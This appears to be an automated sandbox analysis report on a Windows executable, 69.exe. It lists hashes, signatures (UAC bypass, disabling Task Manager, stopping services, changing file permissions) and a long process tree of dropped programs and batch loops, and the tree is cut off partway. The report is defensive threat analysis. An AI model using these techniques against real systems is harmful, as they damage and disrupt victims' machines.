Resubmissions

10-10-2024 22:41

241010-2mlydswbmn 10

21-09-2024 20:56

240921-zq2f5stcqk 3

21-09-2024 19:40

240921-ydv8xszdjp 10

21-09-2024 19:07

240921-xszn8aybqe 10

Analysis

  • max time kernel
    9s
  • max time network
    25s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    21-09-2024 19:40

Errors

Reason
Machine shutdown

General

  • Target

    69.exe

  • Size

    2.4MB

  • MD5

    165b9d15346eed1bd8da9780eb7ab4bf

  • SHA1

    a9895dca7b49cd345634809d03baa51d5078c639

  • SHA256

    6606052fe50484563254b45f679dcbb9d42fff8ede7e8dba609e2760a5e0b3b7

  • SHA512

    b70d1ca87b71b2d0b9611e51e0a26e27b7d1a75072113965cbced770e3f46d9b7147225cb566ec06cac2921f8e4860faf882f96d2a866b2408dfacd4aaeecbf7

  • SSDEEP

    49152:GpUlRhMQfcBROIbrGTPmbpzyLdKDfWLDooV9VwwzuDDFDdexGQw:GpUlBcjnpkwfkkS9V/YTAGj

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Disables Task Manager via registry modification
  • Possible privilege escalation attempt 8 IoCs
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 3 IoCs
  • Modifies file permissions 1 TTPs 8 IoCs
  • Modifies system executable filetype association 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 2 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 64 IoCs
  • Modifies registry class 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\69.exe
    "C:\Users\Admin\AppData\Local\Temp\69.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:956
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\PerfLogs\windows\warn.vbs"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2708
      • C:\PerfLogs\windows\exec.exe
        "C:\PerfLogs\windows\exec.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2244
        • C:\Windows\system32\cmd.exe
          "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A2F7.tmp\A2F8.tmp\A2F9.bat C:\PerfLogs\windows\exec.exe"
          4⤵
          • Drops file in System32 directory
          • Drops file in Windows directory
          • Suspicious use of WriteProcessMemory
          PID:2384
          • C:\PerfLogs\windows\jumpscare.exe
            jumpscare.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2856
            • C:\Windows\system32\cmd.exe
              "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A41F.tmp\A420.tmp\A421.bat C:\PerfLogs\windows\jumpscare.exe"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:640
              • C:\Program Files\Windows Media Player\wmplayer.exe
                wmplayer.exe "C:\PerfLogs\windows\tape.mp4"
                7⤵
                • Modifies registry class
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of WriteProcessMemory
                PID:5076
                • C:\Windows\System32\unregmp2.exe
                  "C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
                  8⤵
                  • Enumerates connected drives
                  • Suspicious use of AdjustPrivilegeToken
                  PID:708
          • C:\PerfLogs\windows\rnbowspam.exe
            rnbowspam.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3712
            • C:\Windows\system32\cmd.exe
              "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A420.tmp\A420.tmp\A421.bat C:\PerfLogs\windows\rnbowspam.exe"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3664
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /K rainbow.bat
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:4964
                • C:\Windows\system32\timeout.exe
                  timeout /t 0
                  8⤵
                    PID:1596
                  • C:\Windows\system32\timeout.exe
                    timeout /t 0
                    8⤵
                    • Delays execution with timeout.exe
                    PID:916
                  • C:\Windows\system32\timeout.exe
                    timeout /t 0
                    8⤵
                      PID:1484
                    • C:\Windows\system32\timeout.exe
                      timeout /t 0
                      8⤵
                        PID:2056
                      • C:\Windows\system32\timeout.exe
                        timeout /t 0
                        8⤵
                          PID:3048
                        • C:\Windows\system32\timeout.exe
                          timeout /t 0
                          8⤵
                            PID:1636
                          • C:\Windows\system32\timeout.exe
                            timeout /t 0
                            8⤵
                            • Delays execution with timeout.exe
                            PID:2160
                          • C:\Windows\system32\timeout.exe
                            timeout /t 0
                            8⤵
                            • Delays execution with timeout.exe
                            PID:2168
                          • C:\Windows\system32\timeout.exe
                            timeout /t 0
                            8⤵
                              PID:1528
                            • C:\Windows\system32\timeout.exe
                              timeout /t 0
                              8⤵
                                PID:4432
                              • C:\Windows\system32\timeout.exe
                                timeout /t 0
                                8⤵
                                  PID:1608
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 0
                                  8⤵
                                    PID:2560
                                  • C:\Windows\system32\timeout.exe
                                    timeout /t 0
                                    8⤵
                                      PID:2708
                                    • C:\Windows\system32\timeout.exe
                                      timeout /t 0
                                      8⤵
                                      • Delays execution with timeout.exe
                                      PID:1784
                                    • C:\Windows\system32\timeout.exe
                                      timeout /t 0
                                      8⤵
                                        PID:4708
                                      • C:\Windows\system32\timeout.exe
                                        timeout /t 0
                                        8⤵
                                          PID:1280
                                        • C:\Windows\system32\timeout.exe
                                          timeout /t 0
                                          8⤵
                                          • Delays execution with timeout.exe
                                          PID:3024
                                        • C:\Windows\system32\timeout.exe
                                          timeout /t 0
                                          8⤵
                                            PID:3460
                                          • C:\Windows\system32\timeout.exe
                                            timeout /t 0
                                            8⤵
                                              PID:708
                                            • C:\Windows\system32\timeout.exe
                                              timeout /t 0
                                              8⤵
                                              • Delays execution with timeout.exe
                                              PID:2980
                                            • C:\Windows\system32\timeout.exe
                                              timeout /t 0
                                              8⤵
                                              • Delays execution with timeout.exe
                                              PID:3076
                                            • C:\Windows\system32\timeout.exe
                                              timeout /t 0
                                              8⤵
                                                PID:1012
                                              • C:\Windows\system32\timeout.exe
                                                timeout /t 0
                                                8⤵
                                                  PID:1004
                                                • C:\Windows\system32\timeout.exe
                                                  timeout /t 0
                                                  8⤵
                                                    PID:4432
                                                  • C:\Windows\system32\timeout.exe
                                                    timeout /t 0
                                                    8⤵
                                                      PID:1480
                                                    • C:\Windows\system32\timeout.exe
                                                      timeout /t 0
                                                      8⤵
                                                        PID:3128
                                                      • C:\Windows\system32\timeout.exe
                                                        timeout /t 0
                                                        8⤵
                                                        • Delays execution with timeout.exe
                                                        PID:2024
                                                      • C:\Windows\system32\timeout.exe
                                                        timeout /t 0
                                                        8⤵
                                                          PID:1112
                                                        • C:\Windows\system32\timeout.exe
                                                          timeout /t 0
                                                          8⤵
                                                            PID:2180
                                                          • C:\Windows\system32\timeout.exe
                                                            timeout /t 0
                                                            8⤵
                                                              PID:2540
                                                            • C:\Windows\system32\timeout.exe
                                                              timeout /t 0
                                                              8⤵
                                                              • Delays execution with timeout.exe
                                                              PID:1460
                                                            • C:\Windows\system32\timeout.exe
                                                              timeout /t 0
                                                              8⤵
                                                                PID:1592
                                                              • C:\Windows\system32\timeout.exe
                                                                timeout /t 0
                                                                8⤵
                                                                  PID:1500
                                                                • C:\Windows\system32\timeout.exe
                                                                  timeout /t 0
                                                                  8⤵
                                                                  • Delays execution with timeout.exe
                                                                  PID:2756
                                                                • C:\Windows\system32\timeout.exe
                                                                  timeout /t 0
                                                                  8⤵
                                                                    PID:1484
                                                                  • C:\Windows\system32\timeout.exe
                                                                    timeout /t 0
                                                                    8⤵
                                                                    • Delays execution with timeout.exe
                                                                    PID:796
                                                                  • C:\Windows\system32\timeout.exe
                                                                    timeout /t 0
                                                                    8⤵
                                                                      PID:1840
                                                                    • C:\Windows\system32\timeout.exe
                                                                      timeout /t 0
                                                                      8⤵
                                                                        PID:4724
                                                                      • C:\Windows\system32\timeout.exe
                                                                        timeout /t 0
                                                                        8⤵
                                                                        • Delays execution with timeout.exe
                                                                        PID:2896
                                                                      • C:\Windows\system32\timeout.exe
                                                                        timeout /t 0
                                                                        8⤵
                                                                        • Delays execution with timeout.exe
                                                                        PID:924
                                                                      • C:\Windows\system32\timeout.exe
                                                                        timeout /t 0
                                                                        8⤵
                                                                          PID:3552
                                                                        • C:\Windows\system32\timeout.exe
                                                                          timeout /t 0
                                                                          8⤵
                                                                            PID:4444
                                                                          • C:\Windows\system32\timeout.exe
                                                                            timeout /t 0
                                                                            8⤵
                                                                              PID:5100
                                                                            • C:\Windows\system32\timeout.exe
                                                                              timeout /t 0
                                                                              8⤵
                                                                              • Delays execution with timeout.exe
                                                                              PID:2024
                                                                            • C:\Windows\system32\timeout.exe
                                                                              timeout /t 0
                                                                              8⤵
                                                                              • Delays execution with timeout.exe
                                                                              PID:1600
                                                                            • C:\Windows\system32\timeout.exe
                                                                              timeout /t 0
                                                                              8⤵
                                                                                PID:3920
                                                                              • C:\Windows\system32\timeout.exe
                                                                                timeout /t 0
                                                                                8⤵
                                                                                • Delays execution with timeout.exe
                                                                                PID:1580
                                                                              • C:\Windows\system32\timeout.exe
                                                                                timeout /t 0
                                                                                8⤵
                                                                                  PID:3024
                                                                                • C:\Windows\system32\timeout.exe
                                                                                  timeout /t 0
                                                                                  8⤵
                                                                                  • Delays execution with timeout.exe
                                                                                  PID:3248
                                                                                • C:\Windows\system32\timeout.exe
                                                                                  timeout /t 0
                                                                                  8⤵
                                                                                  • Delays execution with timeout.exe
                                                                                  PID:2668
                                                                                • C:\Windows\system32\timeout.exe
                                                                                  timeout /t 0
                                                                                  8⤵
                                                                                  • Delays execution with timeout.exe
                                                                                  PID:2980
                                                                                • C:\Windows\system32\timeout.exe
                                                                                  timeout /t 0
                                                                                  8⤵
                                                                                  • Delays execution with timeout.exe
                                                                                  PID:2808
                                                                                • C:\Windows\system32\timeout.exe
                                                                                  timeout /t 0
                                                                                  8⤵
                                                                                    PID:4960
                                                                                  • C:\Windows\system32\timeout.exe
                                                                                    timeout /t 0
                                                                                    8⤵
                                                                                      PID:4292
                                                                                    • C:\Windows\system32\timeout.exe
                                                                                      timeout /t 0
                                                                                      8⤵
                                                                                        PID:3712
                                                                                      • C:\Windows\system32\timeout.exe
                                                                                        timeout /t 0
                                                                                        8⤵
                                                                                        • Delays execution with timeout.exe
                                                                                        PID:2300
                                                                                      • C:\Windows\system32\timeout.exe
                                                                                        timeout /t 0
                                                                                        8⤵
                                                                                          PID:1780
                                                                                        • C:\Windows\system32\timeout.exe
                                                                                          timeout /t 0
                                                                                          8⤵
                                                                                            PID:4284
                                                                                          • C:\Windows\system32\timeout.exe
                                                                                            timeout /t 0
                                                                                            8⤵
                                                                                              PID:328
                                                                                            • C:\Windows\system32\timeout.exe
                                                                                              timeout /t 0
                                                                                              8⤵
                                                                                              • Delays execution with timeout.exe
                                                                                              PID:3464
                                                                                            • C:\Windows\system32\timeout.exe
                                                                                              timeout /t 0
                                                                                              8⤵
                                                                                                PID:3920
                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                timeout /t 0
                                                                                                8⤵
                                                                                                  PID:3784
                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                  timeout /t 0
                                                                                                  8⤵
                                                                                                  • Delays execution with timeout.exe
                                                                                                  PID:1280
                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                  timeout /t 0
                                                                                                  8⤵
                                                                                                    PID:1808
                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                    timeout /t 0
                                                                                                    8⤵
                                                                                                      PID:2480
                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                      timeout /t 0
                                                                                                      8⤵
                                                                                                      • Delays execution with timeout.exe
                                                                                                      PID:1904
                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                    timeout /t 1
                                                                                                    7⤵
                                                                                                    • Delays execution with timeout.exe
                                                                                                    PID:1344
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /K rainbow.bat
                                                                                                    7⤵
                                                                                                      PID:2040
                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                        timeout /t 0
                                                                                                        8⤵
                                                                                                          PID:2500
                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                          timeout /t 0
                                                                                                          8⤵
                                                                                                            PID:3628
                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                            timeout /t 0
                                                                                                            8⤵
                                                                                                              PID:2776
                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                              timeout /t 0
                                                                                                              8⤵
                                                                                                              • Delays execution with timeout.exe
                                                                                                              PID:1004
                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                              timeout /t 0
                                                                                                              8⤵
                                                                                                                PID:2504
                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                timeout /t 0
                                                                                                                8⤵
                                                                                                                  PID:2768
                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                  timeout /t 0
                                                                                                                  8⤵
                                                                                                                    PID:4084
                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                    timeout /t 0
                                                                                                                    8⤵
                                                                                                                      PID:1744
                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                      timeout /t 0
                                                                                                                      8⤵
                                                                                                                        PID:4748
                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                        timeout /t 0
                                                                                                                        8⤵
                                                                                                                          PID:3000
                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                          timeout /t 0
                                                                                                                          8⤵
                                                                                                                          • Delays execution with timeout.exe
                                                                                                                          PID:1948
                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                          timeout /t 0
                                                                                                                          8⤵
                                                                                                                          • Delays execution with timeout.exe
                                                                                                                          PID:2068
                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                          timeout /t 0
                                                                                                                          8⤵
                                                                                                                          • Delays execution with timeout.exe
                                                                                                                          PID:1832
                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                          timeout /t 0
                                                                                                                          8⤵
                                                                                                                            PID:3456
                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                            timeout /t 0
                                                                                                                            8⤵
                                                                                                                              PID:4988
                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                              timeout /t 0
                                                                                                                              8⤵
                                                                                                                              • Delays execution with timeout.exe
                                                                                                                              PID:1472
                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                              timeout /t 0
                                                                                                                              8⤵
                                                                                                                                PID:3856
                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                timeout /t 0
                                                                                                                                8⤵
                                                                                                                                  PID:2056
                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                  timeout /t 0
                                                                                                                                  8⤵
                                                                                                                                    PID:2504
                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                    timeout /t 0
                                                                                                                                    8⤵
                                                                                                                                      PID:1416
                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                      timeout /t 0
                                                                                                                                      8⤵
                                                                                                                                        PID:1596
                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                        timeout /t 0
                                                                                                                                        8⤵
                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                        PID:4900
                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                        timeout /t 0
                                                                                                                                        8⤵
                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                        PID:3664
                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                        timeout /t 0
                                                                                                                                        8⤵
                                                                                                                                          PID:3644
                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                          timeout /t 0
                                                                                                                                          8⤵
                                                                                                                                            PID:3404
                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                            timeout /t 0
                                                                                                                                            8⤵
                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                            PID:3464
                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                            timeout /t 0
                                                                                                                                            8⤵
                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                            PID:3632
                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                            timeout /t 0
                                                                                                                                            8⤵
                                                                                                                                              PID:760
                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                              timeout /t 0
                                                                                                                                              8⤵
                                                                                                                                                PID:3024
                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                timeout /t 0
                                                                                                                                                8⤵
                                                                                                                                                  PID:3460
                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                  timeout /t 0
                                                                                                                                                  8⤵
                                                                                                                                                    PID:2668
                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                    timeout /t 0
                                                                                                                                                    8⤵
                                                                                                                                                      PID:396
                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                      timeout /t 0
                                                                                                                                                      8⤵
                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                      PID:2288
                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                      timeout /t 0
                                                                                                                                                      8⤵
                                                                                                                                                        PID:1012
                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                        timeout /t 0
                                                                                                                                                        8⤵
                                                                                                                                                          PID:8
                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                          timeout /t 0
                                                                                                                                                          8⤵
                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                          PID:908
                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                          timeout /t 0
                                                                                                                                                          8⤵
                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                          PID:5020
                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                          timeout /t 0
                                                                                                                                                          8⤵
                                                                                                                                                            PID:1732
                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                            timeout /t 0
                                                                                                                                                            8⤵
                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                            PID:4292
                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                            timeout /t 0
                                                                                                                                                            8⤵
                                                                                                                                                              PID:1996
                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                              timeout /t 0
                                                                                                                                                              8⤵
                                                                                                                                                                PID:4772
                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                timeout /t 0
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:4708
                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                  timeout /t 0
                                                                                                                                                                  8⤵
                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                  PID:2220
                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                  timeout /t 0
                                                                                                                                                                  8⤵
                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                  PID:4568
                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                  timeout /t 0
                                                                                                                                                                  8⤵
                                                                                                                                                                    PID:2888
                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                    timeout /t 0
                                                                                                                                                                    8⤵
                                                                                                                                                                      PID:4988
                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                      timeout /t 0
                                                                                                                                                                      8⤵
                                                                                                                                                                        PID:784
                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                        timeout /t 0
                                                                                                                                                                        8⤵
                                                                                                                                                                          PID:1368
                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                          timeout /t 0
                                                                                                                                                                          8⤵
                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                          PID:1152
                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                          timeout /t 0
                                                                                                                                                                          8⤵
                                                                                                                                                                            PID:3828
                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                            timeout /t 0
                                                                                                                                                                            8⤵
                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                            PID:4924
                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                            timeout /t 0
                                                                                                                                                                            8⤵
                                                                                                                                                                              PID:1284
                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                              timeout /t 0
                                                                                                                                                                              8⤵
                                                                                                                                                                                PID:1552
                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                timeout /t 0
                                                                                                                                                                                8⤵
                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                PID:3080
                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                timeout /t 0
                                                                                                                                                                                8⤵
                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                PID:2132
                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                timeout /t 0
                                                                                                                                                                                8⤵
                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                PID:800
                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                timeout /t 0
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:644
                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                  timeout /t 0
                                                                                                                                                                                  8⤵
                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                  PID:2332
                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                  timeout /t 0
                                                                                                                                                                                  8⤵
                                                                                                                                                                                    PID:3468
                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                    timeout /t 0
                                                                                                                                                                                    8⤵
                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                    PID:1636
                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                    timeout /t 0
                                                                                                                                                                                    8⤵
                                                                                                                                                                                      PID:2756
                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                    7⤵
                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                    PID:2808
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /K rainbow.bat
                                                                                                                                                                                    7⤵
                                                                                                                                                                                      PID:4636
                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                        timeout /t 0
                                                                                                                                                                                        8⤵
                                                                                                                                                                                          PID:4000
                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                          timeout /t 0
                                                                                                                                                                                          8⤵
                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                          PID:800
                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                          timeout /t 0
                                                                                                                                                                                          8⤵
                                                                                                                                                                                            PID:4692
                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                            timeout /t 0
                                                                                                                                                                                            8⤵
                                                                                                                                                                                              PID:2720
                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                              timeout /t 0
                                                                                                                                                                                              8⤵
                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                              PID:4744
                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                              timeout /t 0
                                                                                                                                                                                              8⤵
                                                                                                                                                                                                PID:2696
                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                timeout /t 0
                                                                                                                                                                                                8⤵
                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                PID:644
                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                timeout /t 0
                                                                                                                                                                                                8⤵
                                                                                                                                                                                                  PID:3468
                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                  timeout /t 0
                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                    PID:1636
                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                    timeout /t 0
                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                      PID:408
                                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                      timeout /t 0
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                      PID:3248
                                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                      timeout /t 0
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                        PID:2888
                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                        timeout /t 0
                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                          PID:2688
                                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                          timeout /t 0
                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                            PID:2892
                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                            timeout /t 0
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                              PID:4960
                                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                              timeout /t 0
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                PID:3536
                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                timeout /t 0
                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                PID:4532
                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                timeout /t 0
                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                PID:5084
                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                timeout /t 0
                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                  PID:884
                                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                  timeout /t 0
                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                  PID:4292
                                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                  timeout /t 0
                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                    PID:2300
                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                    timeout /t 0
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                      PID:4756
                                                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                      timeout /t 0
                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                      PID:1492
                                                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                      timeout /t 0
                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                      PID:3920
                                                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                      timeout /t 0
                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                      PID:4708
                                                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                      timeout /t 0
                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                        PID:1580
                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                        timeout /t 0
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                          PID:1808
                                                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                          timeout /t 0
                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                            PID:1920
                                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                            timeout /t 0
                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                              PID:3924
                                                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                              timeout /t 0
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                PID:1104
                                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                timeout /t 0
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                  PID:2980
                                                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
